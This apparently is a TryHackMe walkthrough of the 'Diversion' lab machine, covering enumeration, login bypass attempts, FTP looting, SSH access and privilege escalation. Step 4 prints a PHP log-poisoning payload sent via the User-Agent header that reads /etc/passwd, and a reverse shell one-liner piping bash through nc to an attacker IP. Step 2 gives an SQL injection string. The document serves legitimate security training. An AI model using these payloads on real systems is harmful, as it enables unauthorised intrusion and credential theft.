Diversion TryHackMe Walkthrough

Bwiz
2 min readMay 26, 2024

--

Welcome to the Diversion walkthrough! This guide will take you through the steps to identify and exploit the vulnerabilities within this virtual machine. Let’s get started!

Room link:

https://tryhackme.com/jr/diversionIb

Step 1: Enumeration

Start with Nmap Scan:

  • Begin by scanning the target machine to identify open ports and services.
nmap -sC -sV -oN nmap_initial_scan.txt <TARGET_IP>

Review Nmap Results:

  • The scan reveals the following open ports:
  • 22/tcp: SSH
  • 80/tcp: HTTP
  • 21/tcp: FTP

Step 2: Investigate HTTP Service

Access the Web Server:

  • Open the web browser and navigate to http://<TARGET_IP>/. You’ll find a login page.

Inspect the Source Code:

  • Check the source code of the login page for any clues or vulnerabilities.

Try SQL Injection:

  • Attempt a basic SQL injection to bypass the login:
    Username: admin' OR '1'='1 Password: anything

Unsuccessful Login:

  • The injection is not successful, you cannot log into the system, it was a diversion!

Step 3: Explore the Web Application

Directory Busting:

  • Check for other directories on the web server:
dirsearch -u <TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
  • You’ll find a testdirectory with a single log.txtfile. Within it you will see mention of a access_log.php file. This can be accessed at http://<TARGET_IP>/access_log.php.

Step 4: Code Injection via Apache Logs

Read the /etc/passwdfile:

  • Use a tool like curl to inject a cat command into the User-Agent header:
curl -A "<?php system('cat /etc/passwd'); ?>" http://<TARGET_IP>
  • Navigate to the access_log.php file
  • Make note of a user named jimmy
  • For a more advanced technique, challenge yourself to inject reverse shell code into the log file.
  • For example:
rlwrap -cAr nc -lvnp 80 
curl -A "<?php exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.9.2.91 80 >/tmp/f'); ?>" http://10.10.158.198/

Step 5: Exploit FTP

FTP Enumeration:

  • Connect to the FTP service and look for any interesting files:
ftp <TARGET_IP>
  • Check for anonymous login or default credentials. You will find a adminnote.txtfile with mention of weak passwords being used: password123

Step 6: SSH

  • We can SSH into the user account jimmy using the found credentials password123
ssh jimmy@<TARGET_IP>

Step 7: Privilege Escalation

Check Sudo Permissions:

  • Once you have a shell, check for any sudo permissions:
sudo -l

Exploit Weak Passwords:

  • If you find any users with weak passwords, use them to escalate privileges:
su <username>

Step 8: Capture the Flags

Locate User Flag:

  • Navigate to the user’s home directory and capture the user flag:
cat /home/<username>/local.txt
cat /root/proof.txt

Conclusion

Congratulations! You’ve successfully exploited the Diversion VM and captured all the flags. This walkthrough covered SQL injection, Apache log file code injection, FTP, and privilege escalation techniques. Always remember to follow ethical guidelines and use your skills for good.

Happy hacking!

--

--